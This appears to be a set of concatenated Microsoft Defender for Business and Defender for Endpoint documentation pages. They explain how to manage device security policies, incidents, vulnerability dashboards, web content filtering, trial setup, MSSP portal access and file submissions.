-[Next-generation protection](mdb-next-generation-protection.md) includes robust antivirus and antimalware protection for computers and mobile devices. The default policies are designed to protect your devices and users without hindering productivity. However, you can customize your policies to suit your business needs. For more details, see [Review or edit your next-generation protection policies](mdb-next-generation-protection.md).
-
-[Firewall policies](mdb-firewall.md) help secure devices by establishing rules that determine what network traffic is permitted to flow to and from devices. You can use firewall protection to specify whether to allow or to block connections on devices in various locations. For example, your firewall settings can allow inbound connections on devices that are connected to your company's internal network, but prevent connections when the device is on a network with untrusted devices. For more details, see [Firewall](mdb-firewall.md).
-
-## Policies to set up in Defender for Business
-
-In addition to next-generation protection and firewall policies, there are three other types of policies to configure for the best protection with Defender for Business:
--- **Web content filtering**, which turns on web protection for your organization.-- **Controlled folder access**, which is an important part of ransomware protection (Intune is required to set up and manage)-- **Attack surface reduction rules**, which help reduce device vulnerability (Intune is required to set up and manage)-
-[Web content filtering](mdb-web-content-filtering.md), which enables your security team to track and regulate access to websites based on content categories. Examples of categories include adult content, high bandwidth content, and legal liability content. When you set up your web content filtering policy, you enable web protection for your organization. For more information, see [Web content filtering](mdb-web-content-filtering.md).
-
-[Controlled folder access](mdb-controlled-folder-access.md) allows only trusted apps to access protected folders on Windows devices. Think of this capability as ransomware mitigation. You can set up or edit your controlled folder access policy in Microsoft Intune. For more information, see [Set up or edit your controlled folder access policy](mdb-controlled-folder-access.md).
-
-[Attack surface reduction rules](mdb-asr.md) target certain software behaviors that are often considered risky because they're commonly abused by attackers through malware. Examples of such behaviors include launching executable files and scripts that attempt to download or run files. Attack surface reduction rules can constrain software-based risky behaviors, and help keep your organization safe. At a minimum, we recommend configuring standard protection rules to help protect your network without causing disruption for users. For more information, see [Enable your attack surface reduction rules in Microsoft Defender for Business](mdb-asr.md).
-
-> [!NOTE]
-> Intune is required to configure [controlled folder access](mdb-controlled-folder-access.md) and [attack surface reduction rules](mdb-asr.md). Intune is not included in the standalone version of Defender for Business, but can be added on to your subscription.
-
-## View your existing policies
-
-You can view your existing policies in either Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) or the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) (if you're using Intune).
-
-<a name='microsoft-365-defender-portal'></a>
-
-## [**Microsoft Defender portal**](#tab/M365D)
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Configuration management** > **Device configuration**. Policies are organized by operating system (such as **Windows client**) and policy type (such as **Next-generation protection** and **Firewall**).
-
-3. Select an operating system tab (for example, **Windows clients**), and then review the list of policies under each category (such as **Next-generation protection** and **Firewall**).
-
-4. To view more details about a policy, select its name. A side pane will open that provides more information about that policy, such as which devices are protected by that policy.
-
-## [**Intune admin center**](#tab/intune)
-
-1. Go to the Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com)) and sign in.
-
-2. In the navigation pane, select **Endpoint security**, and then choose a category, such as **Antivirus**, **Firewall**. or **Attack surface reduction**.
-
-3. Any existing policies are listed for the category you selected. To view more details about a policy, select its name.
---
-## Edit an existing policy
-
-You can view your existing policies in either Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) or the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) (if you're using Intune).
-
-<a name='microsoft-365-defender-portal'></a>
-
-## [**Microsoft Defender portal**](#tab/M365D)
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Device configuration**. Policies are organized by operating system (such as **Windows client**) and policy type (such as **Next-generation protection** and **Firewall**).
-
-3. Select an operating system tab (for example, **Windows clients**), and then review the list of policies under the **Next-generation protection** and **Firewall** categories.
-
-4. To edit a policy, select its name, and then choose **Edit**.
-
-5. On the **General information** tab, review the information. If necessary, you can edit the description. Then choose **Next**.
-
-6. On the **Device groups** tab, determine which device groups should receive this policy.
-
- - To keep the selected device group as it is, choose **Next**.
- - To remove a device group from the policy, select **Remove**.
- - To set up a new device group, select **Create new group**, and then set up your device group. (To get help with this task, see [Device groups](mdb-create-edit-device-groups.md).)
- - To apply the policy to another device group, select **Use existing group**.
-
- After you have specified which device groups should receive the policy, choose **Next**.
-
-7. On the **Configuration settings** tab, review the settings. If necessary, you can edit the settings for your policy. To get help with this task, see the following articles:
-
- - [Understand next-generation configuration settings](mdb-next-generation-protection.md)
- - [Firewall settings](mdb-firewall.md)
-
- After you have specified your next-generation protection settings, choose **Next**.
-
-8. On the **Review your policy** tab, review the general information, targeted devices, and configuration settings.
-
- - Make any needed changes by selecting **Edit**.
- - When you're ready to proceed, choose **Update policy**.
-
-## [**Intune admin center**](#tab/intune)
-
-1. Go to the Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com)) and sign in.
-
-2. In the navigation pane, select **Endpoint security**, and then choose a category, such as **Antivirus**, **Firewall**. or **Attack surface reduction**.
-
-3. Existing policies are listed. Select a policy to view more details about it.
-
-4. Next to **Configuration settings**, choose **Edit**.
-
- To get help with this task, see [Edit a policy in Intune](/mem/intune/protect/endpoint-security-policy#to-edit-a-policy).
---
-## Create a new policy
-
-<a name='microsoft-365-defender-portal'></a>
-
-## [**Microsoft Defender portal**](#tab/M365D)
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Device configuration**. Policies are organized by operating system (such as **Windows client**) and policy type (such as **Next-generation protection** and **Firewall**).
-
-3. Select an operating system tab (for example, **Windows clients**), and then review the list of **Next-generation protection** policies.
-
-4. Under **Next-generation protection** or **Firewall**, select **+ Add**.
-
-5. On the **General information** tab, take the following steps:
-
- 1. Specify a name and description. This information will help you and your team identify the policy later on.
- 2. Review the policy order, and edit it if necessary. (For more information, see [Policy order](mdb-policy-order.md).)
- 3. Choose **Next**.
-
-7. On the **Device groups** tab, either create a new device group, or use an existing group. Policies are assigned to devices through device groups. Here are some things to keep in mind:
-
- - Initially, you might only have your default device group, which includes the devices people in your company are using to access company data and email. You can keep and use your default device group.
- - Create a new device group to apply a policy with specific settings that are different from the default policy.
- - When you set up your device group, you specify certain criteria, such as the operating system version. Devices that meet the criteria are included in that device group, unless you exclude them.
- - All device groups, including the default and custom device groups that you define, are stored in Microsoft Entra ID.
-
- To learn more about device groups, see [Device groups](mdb-create-edit-device-groups.md).
-
-8. On the **Configuration settings** tab, specify the settings for your policy, and then choose **Next**. For more information about the individual settings, see [Configuration settings for Defender for Business](mdb-next-generation-protection.md).
-
-9. On the **Review your policy** tab, review the general information, targeted devices, and configuration settings.
-
- - Make any needed changes by selecting **Edit**.
- - When you're ready to proceed, choose **Create policy**.
-
-## [**Intune admin center**](#tab/intune)
-
-1. Go to the Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com)) and sign in.
-
-2. In the navigation pane, select **Endpoint security**, and then choose a category, such as **Antivirus**, **Firewall**. or **Attack surface reduction**.
-
-3. Select **+ Create Policy**.
-
- - If your policy is for Windows devices, in the **Platform** list, choose **Windows 10, Windows 11, and Windows Server**.
- - If your policy is for Mac, in the **Platform** list, choose **macOS**.
-
-4. In the **Profile** list, select a profile, and then choose **Create**.
-
- The **Profile** list varies depending on what you selected for **Platform**, as summarized in the following table:
-
- | Platform | Profile | Description |
- ||||
- | Windows 10, Windows 11, and Windows Server | Microsoft Defender Antivirus exclusions | Select this template to define [exclusions for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/defender-endpoint-antivirus-exclusions#microsoft-defender-antivirus-exclusions). |
- | Windows 10, Windows 11, and Windows Server | Microsoft Defender Antivirus | Select this template to set up your [next-generation protection policy](mdb-next-generation-protection.md). |
- | Windows 10, Windows 11, and Windows Server | Windows Security Experience | Select this template to turn on [tamper protection](../defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md) and to configure what users can see or do with the Windows Security app on their computer. |
- | macOS | Antivirus | Select this template to set up your [next-generation protection policy](mdb-next-generation-protection.md) for devices running macOS. |
- | Windows 10, Windows 11, and Windows Server | Microsoft Defender Firewall | Select this template to set up your [firewall protection policy](mdb-firewall.md). |
- | Windows 10, Windows 11, and Windows Server | Microsoft Defender Firewall Rules | Select this template to set up exceptions to your firewall policy. These exceptions are defined through [custom rules](mdb-firewall.md#manage-your-custom-rules-for-firewall-policies-in-microsoft-defender-for-business). |
- | Windows 10, Windows 11, and Windows Server | Attack Surface Reduction Rules | Select this template to set up [attack surface reduction rules](mdb-asr.md) or [controlled folder access](mdb-controlled-folder-access.md). |
-
-5. Use the wizard to set up your policy. To get help, see [Manage device security with endpoint security policies in Microsoft Intune](/mem/intune/protect/endpoint-security-policy).
---
-## See also
--- [Understand policy order](mdb-policy-order.md)-- [Set up your security policies and settings](mdb-configure-security-settings.md)-
security Mdb View Manage Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-view-manage-incidents.md
- Title: View and manage incidents in Microsoft Defender for Business
-description: View and manage alerts, respond to threats, manage devices, and review remediation actions on detected threats in Defender for Business.
----- Previously updated : 10/10/2023---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# View and manage incidents in Microsoft Defender for Business
-
-As threats are detected and alerts are triggered, incidents are created. Your company's security team can view and manage incidents in the Microsoft Defender portal. You must have appropriate permissions assigned to perform the tasks in this article. See [Security roles and permissions in Microsoft Defender for Business](mdb-roles-permissions.md).
-
-**This article includes**:
--- [How to monitor your incidents and alerts](#monitor-your-incidents--alerts)-- [Alert severity](#alert-severity)-- [Next steps](#next-steps)--
-## Monitor your incidents & alerts
-
-1. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, go to **Incidents & alerts**, and then select **Incidents**. Any incidents that were created are listed on the page.
-
- > [!IMPORTANT]
- > If you see an incident tagged with `Attack disruption`, it means an advanced attack has been detected. See [Automatic attack disruption](mdb-attack-disruption.md).
-
-2. Select an alert to open its flyout pane, where you can learn more about the alert.
-
- :::image type="content" source="../../medib-incident-flyout.png" alt-text="Screenshot of incident selected with flyout open":::
-
-3. In the flyout pane, you can see the alert title, view a list of assets (such as devices or user accounts) that were affected, take available actions, and use links to view more information and even open the details page for the selected alert.
-
-> [!TIP]
-> Defender for Business is designed to help you address detected threats by recommending actions you can take. When you view an alert, look for these suggestions. Also notice the alert severity, which is determined not only on the basis of the detected threat severity, but also on the level of risk to your company.
-
-## Alert severity
-
-When a threat is detected, a severity level is assigned to each alert that is generated.
--- Microsoft Defender Antivirus assigns an alert severity based on the absolute severity of a detected threat (such as malware) and the potential risk to an individual device (if infected). -- Defender for Business assigns an alert severity based on the severity of the detected behavior, the actual risk to a device, and more importantly, the potential risk to your company. -
-The following table lists a few examples of alerts and their severity levels:
-
-| Scenario | Alert severity and reason |
-|:|:|
-| [Automated attack disruption](mdb-attack-disruption.md) detects an advanced attack, and contains devices or user accounts to help prevent the attack from proceeding. | **High**. Attack disruption capabilities help contain an attack so your IT/security team can address it. |
-| Microsoft Defender Antivirus detects and stops a threat before it does any damage. | **Informational**. The threat was stopped before any damage was done. |
-| Microsoft Defender Antivirus detects malware that was executing within your company. The malware is stopped and remediated. | **Low**. Although some damage might have been done to an individual device, the malware now poses no threat to your company. |
-| Malware that is executing is detected by Defender for Business. The malware is blocked almost immediately. | **Medium** or **High**. The malware poses a threat to individual devices and to your company. |
-| Suspicious behavior is detected but no remediation actions are taken yet. | **Low**, **Medium**, or **High**. The severity depends on the degree to which the behavior poses a threat to your company. |
-
-## Next steps
--- [Learn about automatic attack disruption](mdb-attack-disruption.md)-- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-- [View or edit device policies in Defender for Business](mdb-view-edit-policies.md)-
security Mdb View Tvm Dashboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-view-tvm-dashboard.md
- Title: View your Microsoft Defender Vulnerability Management dashboard in Microsoft Defender for Business
-description: Use your Microsoft Defender Vulnerability Management dashboard to see important items to address in Defender for Business.
----- Previously updated : 08/02/2022---- SMB-- m365-security-- tier1---
-# Use your vulnerability management dashboard in Microsoft Defender for Business
-
-Defender for Business includes a vulnerability management dashboard that is designed to save your security team time and effort. In addition to providing an exposure score, that dashboard enables you to view information about exposed devices and see relevant security recommendations. You can use your Defender Vulnerability Management dashboard to:
--- View your exposure score, which is associated with devices in your company.-- View your top security recommendations, such as addressing impaired communications with devices, turning on firewall protection, or updating Microsoft Defender Antivirus definitions.-- View remediation activities, such as any files that were sent to quarantine, or vulnerabilities found on devices.-
-## Vulnerability management features and capabilities
-
-Vulnerability management features and capabilities in Microsoft Defender for Business include:
--- **Dashboard**: Provides information about vulnerabilities, exposure, and recommendations. You can see recent remediation activities, exposed devices, and ways to improve your company's overall security. Each card in the dashboard includes a link to more detailed information or to a page where you can take a recommended action.-
- :::image type="content" source="medivm-dashboard.png":::
--- **Recommendations**: Lists current security recommendations and related threat information to review and consider. When you select an item in the list, a flyout panel opens with more details about threats and actions you can take.--- **Remediation**: Lists any remediation actions and their status. Remediation activities can include sending a file to quarantine, stopping a process from running, and blocking a detected threat from running. Remediation activities can also include updating a device, running an antivirus scan, and more. -
- :::image type="content" source="medivm-remediation.png":::
--- **Inventories**: Lists software and apps currently in use in your organization. You'll see browsers, operating systems, and other software on devices, along with identified weaknesses and threats.--- **Weaknesses**: Lists vulnerabilities along with the number of exposed devices in your organization. If you see "0" in the Exposed devices column, you do not have to take any immediate action. However, you can learn more about each vulnerability listed on this page. Select an item to learn more about it and what you can do to mitigate the potential threat to your company.-
- :::image type="content" source="medivm-weakness-details.png":::
--- **Event timeline**: Lists vulnerabilities that affect your organization in a timeline view. -
-[Learn more about Microsoft Defender Vulnerability Management](../defender-vulnerability-management/defender-vulnerability-management.md).
-
-## Next steps
--- [Try tutorials and simulations in Defender for Business](mdb-tutorials.md)-- [Onboard devices to Defender for Business](mdb-onboard-devices.md)-- [View or edit policies in Defender for Business](mdb-view-edit-create-policies.md)-
security Mdb Web Content Filtering https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-web-content-filtering.md
- Title: Set up web content filtering in Microsoft Defender for Business
-description: Learn how to set up, view, and edit your web content filtering policy in Microsoft Defender for Business.
--- Previously updated : 06/28/2023------ SMB-- m365-security-- tier1--
-# Web content filtering in Microsoft Defender for Business
-
-Web content filtering enables your security team to track and regulate access to websites based on content categories. When you set up your web content filtering policy, you enable web protection for your organization.
-
-Web content filtering is available on the major web browsers, with blocks performed by Windows Defender SmartScreen (Microsoft Edge) and Network Protection (Chrome, Firefox, Brave, and Opera). For more information, see [Prerequisites for web content filtering](../defender-endpoint/web-content-filtering.md#prerequisites).
-
-In Defender for Business, you can have one web content filtering policy and it's applied to all users.
--
-## Set up web content filtering
-
-1. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), go to **Settings** > **Endpoints** > **Rules** > **Web content filtering**, and then select **+ Add policy**.
-
-2. Specify a name and description for your policy.
-
-3. Select the [categories](#categories-for-web-content-filtering) to block (do not select **Uncategorized**). Use the expand icon to fully expand each parent category, and then select specific web content categories.
-
- To set up an audit-only policy that doesn't block any websites, don't select any categories.
-
-4. Apply the policy to all users. (Scoping to specific devices is not available in Defender for Business.)
-
-5. Review the summary and save the policy. The policy refresh might take up to two hours to apply to your selected devices.
-
-> [!TIP]
-> To learn more about web content filtering, see [Web content filtering](../defender-endpoint/web-content-filtering.md).
-
-## Categories for web content filtering
-
-Not all websites in the categories that are listed below are malicious; however, these websites could be problematic for your company because of compliance regulations, bandwidth usage, or other concerns.
-
-You can start with an audit-only policy to get a better understanding of whether your security team should block any website categories, and edit your policy later.
-
-The following table describes web content categories you can choose for your web content filtering policy:
-
-| Category | Description |
-|:|:|
-| **Adult content** | Sites that are related to cults, gambling, nudity, pornography, sexually explicit material, or violence |
-| **High bandwidth** | Download sites, image sharing sites, or peer-to-peer hosts |
-| **Legal liability** | Sites that include child abuse images, promote illegal activities, foster plagiarism or school cheating, or that promote harmful activities |
-| **Leisure** | Sites that provide web-based chat rooms, online gaming, web-based email, or social networking |
-| **Uncategorized** | Sites that have no content or that are newly registered. <br/><br/>*As a best practice, do not select **Uncategorized**.* |
--
-## Next steps
--- [Set up controlled folder access](mdb-controlled-folder-access.md)-- [Enable your attack surface reduction rules](mdb-asr.md).-- [Review settings for advanced features and the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md).-
security Trial Playbook Defender Business https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/trial-playbook-defender-business.md
- Title: "Microsoft Defender for Business trial user guide"-- NOCSH------- m365-security-- tier1-- essentials-get-started Previously updated : 04/10/2024--- MOE150-- MET150
-description: "Make the most of your Defender for Business trial with this guide. Get set up quickly and get started using your new security capabilities."
---
-# Trial user guide: Microsoft Defender for Business
-
-**Welcome to the Defender for Business trial user guide!**
-
-This guide will help you set up and use key features of your free trial. Using recommendations in this article from the Microsoft Defender team, learn how Defender for Business can help elevate your security from traditional antivirus protection to next-generation protection, endpoint detection and response, and vulnerability management.
-
-## What is Defender for Business?
-
-Defender for Business is a new endpoint security solution designed especially for small and medium-sized businesses with up to 300 employees. With this endpoint security solution, your organization's devices are well-protected from ransomware, malware, phishing, and other threats.
--
-**Let's get started!**
-
-## Set up your trial
-
-Here's how to set up your trial subscription:
-
-1. [Add users and assign licenses](#step-1-add-users-and-assign-licenses).
-2. [Visit the Microsoft Defender portal](#step-2-visit-the-microsoft-365-defender-portal).
-3. [Use the setup wizard](#step-3-use-the-setup-wizard-in-defender-for-business-recommended).
-4. [Set up and configure Defender for Business](#step-4-set-up-and-configure-defender-for-business).
-
-### Step 1: Add users and assign licenses
-
-After you sign up for Defender for Business, the first step is to **[add users and assign licenses](mdb-add-users.md)**.
-
-> [!NOTE]
-> You must be a global administrator to perform this task. The person who signed your company up for Microsoft 365 or Defender for Business is the global administrator by default. [Learn more about roles and permissions](mdb-roles-permissions.md).
-
-<a name='step-2-visit-the-microsoft-365-defender-portal'></a>
-
-### Step 2: Visit the Microsoft Defender portal
-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) is the one-stop shop where you use and manage Defender for Business. It includes callouts to help you get started, cards that surface relevant information, and a navigation bar that provides easy access to the various features and capabilities.
--- **[Visit the Microsoft Defender portal](mdb-get-started.md)**.-- **[Explore the navigation bar](mdb-get-started.md#the-navigation-bar)** on the left side of the screen to access your incidents, view reports, and manage your security policies and settings.-
-### Step 3: Use the setup wizard in Defender for Business (recommended)
-
-Defender for Business was designed to save small and medium-sized businesses time and effort. You can do initial setup and configuration through a setup wizard. The setup wizard helps you grant access to your security team, set up email notifications for your security team, and onboard your company's Windows devices. **[Use the setup wizard](mdb-setup-configuration.md)**.
-
-> [!NOTE]
-> You can only use the setup wizard once.
-
-#### Setup wizard flow: what to expect
-
-> [!TIP]
-> **Using the setup wizard is optional.** If you choose not to use the wizard, or if the wizard is closed before your setup process is complete, you can complete the setup and configuration process on your own. See [Step 4: Set up and configure Defender for Business](#step-4-set-up-and-configure-defender-for-business).
-
-1. **[Assign user permissions](mdb-roles-permissions.md#view-and-edit-role-assignments)**. Grant your security team access to the Microsoft Defender portal.
-
-2. **[Set up email notifications](mdb-email-notifications.md#view-and-edit-email-notifications)** for your security team.
-
-3. **[Onboard and configure Windows devices](mdb-onboard-devices.md)**. Onboarding devices right away helps protect those devices from day one.
-
- > [!NOTE]
- > When you use the setup wizard, the system detects if you have Windows devices that are already enrolled in Intune. You'll be asked if you want to use automatic onboarding for all or some of those devices. You can onboard all Windows devices at once or select specific devices at first and then add more devices later.
-
- To onboard other devices, see [Step 4: Set up and configure Defender for Business](#step-4-set-up-and-configure-defender-for-business).
-
-4. **[View and edit your security policies](mdb-configure-security-settings.md)**. Defender for Business includes default security policies for next-generation protection and firewall protection that can be applied to your company's devices. These preconfigured security policies use recommended settings, so you're protected as soon as your devices are onboarded to Defender for Business. And you can edit the policies or create new ones.
-
-### Step 4: Set up and configure Defender for Business
-
-If you choose not to use the setup wizard, see the following diagram that depicts the [overall setup and configuration process](mdb-setup-configuration.md) for Defender for Business.
-
-[:::image type="content" source="medi)
-
-If you used the setup wizard but you need to onboard more devices, such as non-Windows devices, go directly to [step 4](mdb-onboard-devices.md) in the following procedure:
-
-1. **[Review the requirements](mdb-requirements.md)** to configure and use Defender for Business.
-
-2. **[Assign roles and permissions](mdb-roles-permissions.md)** in the Microsoft Defender portal.
-
- - [Learn about roles in Defender for Business](mdb-roles-permissions.md#roles-in-defender-for-business).
- - [View or edit role assignments for your security team](mdb-roles-permissions.md#view-and-edit-role-assignments).
-
-3. **[Set up email notifications](mdb-email-notifications.md)** for your security team.
-
- - [Learn about types of email notifications](mdb-email-notifications.md#types-of-email-notifications).
- - [View and edit email notification settings](mdb-email-notifications.md#view-and-edit-email-notifications).
-
-4. **[Onboard devices](mdb-onboard-devices.md)**. To onboard Windows and Mac clients, you can use a local script.
-
-5. **[View and configure your security policies](mdb-configure-security-settings.md)**. After you onboard your company's devices to Defender for Business, the next step is to view and edit your security policies and settings.
-
-Defender for Business includes pre-configured security policies that use recommended settings. But you can edit the settings to suit your business needs.
-
-Security policies to review and configure include:
--- [Next-generation protection policies](mdb-next-generation-protection.md) which determine antivirus and antimalware protection for your company's devices-- [Firewall protection and rules](mdb-firewall.md) which determine what network traffic is allowed to flow to and from your company's devices-- [Web content filtering](mdb-web-content-filtering.md) which prevents people from visiting certain websites (URLs) based on categories, such as adult content or legal liability-- [Advanced features](mdb-portal-advanced-feature-settings.md#view-settings-for-advanced-features) such as automated investigation and response and endpoint detection and response (EDR) in block mode-
-## Start using Defender for Business
-
-For the next 30 days, here's guidance from the product team on key features to try:
-
-1. [Use your Microsoft Defender Vulnerability Management dashboard](#1-use-the-defender-vulnerability-management-dashboard).
-
-2. [View and respond to detected threats](#2-view-and-respond-to-detected-threats).
-
-3. [Review security policies](#3-review-security-policies).
-
-4. [Prepare for ongoing security management](#4-prepare-for-ongoing-security-management).
-
-5. [Try the Document Drops Backdoor tutorial](#5-try-the-document-drops-backdoor-tutorial).
-
-### 1. Use the Defender Vulnerability Management dashboard
-
-Defender for Business includes a Defender Vulnerability Management dashboard that's designed to save your security team time and effort. Learn how to [use your Defender Vulnerability Management dashboard](mdb-view-tvm-dashboard.md).
--- View your exposure score, which is associated with devices in your organization.-- View your top security recommendations, such as address impaired communications with devices, turn on firewall protection, or update Microsoft Defender Antivirus definitions.-- View remediation activities, such as any files that were sent to quarantine, or vulnerabilities found on devices.-
-### 2. View and respond to detected threats
-
-As threats are detected and alerts are triggered, incidents are created. Your organization's security team can view and manage incidents in the Microsoft Defender portal. Learn how to [view and respond to detected threats](mdb-view-manage-incidents.md).
--- [View and manage incidents](mdb-view-manage-incidents.md).-- [Respond to and mitigate threats](mdb-respond-mitigate-threats.md).-- [Review mediation actions in the Action Center](mdb-review-remediation-actions.md).-- [View and use reports](mdb-reports.md).-
-### 3. Review security policies
-
-In Defender for Business, security settings are configured through policies that are applied to devices. Defender for Business includes pre-configured policies to help protect your company's devices as soon as they are onboarded, safeguarding your organization against identity, device, application, and document security threats.
-
-Learn how to [review security policies](mdb-view-edit-create-policies.md).
-
-### 4. Prepare for ongoing security management
-
-New security events, such as threat detection on a device, adding new devices, and employees joining or leaving the organization, will require you to manage security. In Defender for Business, there are many ways for you to manage device security.
--- [View a list of onboarded devices](mdb-manage-devices.md#view-the-list-of-onboarded-devices) to see their risk level, exposure level, and health state.-- [Take action on a device](mdb-manage-devices.md#take-action-on-a-device-that-has-threat-detections) that has threat detections.-- [Onboard a device to Defender for Business](mdb-manage-devices.md#onboard-a-device).-- [Offboard a device from Defender for Business](mdb-manage-devices.md#offboard-a-device).-
-### 5. Try the Document Drops Backdoor tutorial
-
-Quickly see how Defender for Business works by trying a tutorial.
-
-Simulate an attack that introduces file-based malware on a test device. The tutorial describes how to use the simulation file and what to watch for in the Microsoft Defender portal.
-
-> [!NOTE]
-> This tutorial requires Microsoft Word to be installed on your test device.
-
-To access the tutorial, do the following:
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com) and sign in.
-
-2. In the navigation pane, under **Endpoints**, choose **Tutorials**.
-
-3. Choose **Document Drops Backdoor**.
-
-## Additional resources
--- [Overview of Defender for Business](mdb-overview.md)-- [Tutorials and simulations in Defender for Business](mdb-tutorials.md)-- [Video: Enterprise-Grade Protection for Small & Medium Sized Businesses](https://youtu.be/umhUNzMqZto)-- [Get Defender for Business](get-defender-business.md)-
security Access Mssp Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/access-mssp-portal.md
- Title: Access the Microsoft Defender XDR MSSP customer portal
-description: Access the Microsoft Defender XDR MSSP customer portal
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Access the Microsoft Defender XDR MSSP customer portal
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mssp-support-abovefoldlink)
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-> [!NOTE]
-> These set of steps are directed towards the MSSP.
-
-By default, MSSP customers access their Microsoft Defender XDR tenant through the following URL: `https://security.microsoft.com/`.
-
-MSSPs however, will need to use a tenant-specific URL in the following format: `https://security.microsoft.com?tid=customer_tenant_id` to access the MSSP customer portal.
-
-In general, MSSPs will need to be added to each of the MSSP customer's Microsoft Entra ID that they intend to manage.
-
-Use the following steps to obtain the MSSP customer tenant ID and then use the ID to access the tenant-specific URL:
-
-1. As an MSSP, log in to Microsoft Entra ID with your credentials.
-2. Switch directory to the MSSP customer's tenant.
-3. Select **Microsoft Entra ID > Properties**. You'll find the tenant ID in the Tenant ID field.
-4. Access the MSSP customer portal by replacing the `customer_tenant_id` value in the following URL: `https://security.microsoft.com/?tid=customer_tenant_id`.
-5. Access a Unified View for MSSP (Preview) in `https://mto.security.microsoft.com/`
-
-## Related topics
--- [Grant MSSP access to the portal](grant-mssp-access.md)-- [Configure alert notifications](configure-mssp-notifications.md)-- [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Admin Submissions Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/admin-submissions-mde.md
- Title: Submit files in Microsoft Defender for Endpoint
-description: Learn how to use the unified submissions feature in Microsoft Defender XDR to submit suspicious emails, URLs, email attachments, and files to Microsoft for scanning.
Previously updated : 02/15/2024----
-localization_priority: Normal
---- m365-security-- tier3---
-# Submit files in Microsoft Defender for Endpoint
--
-**Applies to**
--- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2146806)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-usewdatp-abovefoldlink).
-
-In Microsoft Defender for Endpoint, admins can use the unified submissions feature to submit files and file hashes (SHAs) to Microsoft for review. The unified submissions experience is a one-stop shop for submitting emails, URLs, email attachments, and files in one, easy-to-use submission experience. Admins can use the Microsoft Defender portal or the Microsoft Defender for Endpoint Alert page to submit suspicious files.
-
-## What do you need to know before you begin?
-
-The new unified submissions experience is available only in subscriptions that include Microsoft Defender for Endpoint Plan 2.
-You need to assign permissions before you can perform the procedures in this article. Use one of the following options:
-
-**Microsoft Defender for Endpoint** permissions:
-
-**Microsoft Defender XDR** unified RBAC permissions:
-
-For more information about how you can submit spam, phish, URLs, and email attachments to Microsoft, see [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](../office-365-security/submissions-admin.md).
-
-## Submit a file or file hash to Microsoft from the Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **Files** tab.
-
-3. On the **Files** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add new submission**.
-
- :::image type="content" source="../../media/unified-admin-submission-new.png" alt-text="Screenshot showing how to add a new submission.":::
-
-2. In the **Submit items to Microsoft for review** flyout that opens, select **Files** or **File hash** from the **Select the submission type** dropdown list.
-
- - If you selected **Files**, configure the following options:
- - Select **Browse files**. In the dialog that opens, find and select the file, and then select **Open**. Repeat this step as many times as necessary. To remove an entry from the flyout, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: next to the entry.
- - The maximum total size of all files is 500 MB.
- - Use the password 'infected' to encrypt archive files.
- - **The file should have been categorized as**: Select one of the following values:
- - **Malware** (false negative)
- - **Unwanted software**
- - **Clean** (false positive)
- - **Choose the priority**: Select one of the following values:
- - **Low - bulk file or file hash submission**
- - **Medium - standard submission**
- - **High - needs immediate attention** (max three per day)
- - **Notes for Microsoft (optional)**: Enter an optional note.
- - **Share feedback and relevant content with Microsoft**: Read the privacy statement and then select this option.
-
- :::image type="content" source="../../media/unified-admin-submission-file.png" alt-text="Screenshot showing how to submit files.":::
-
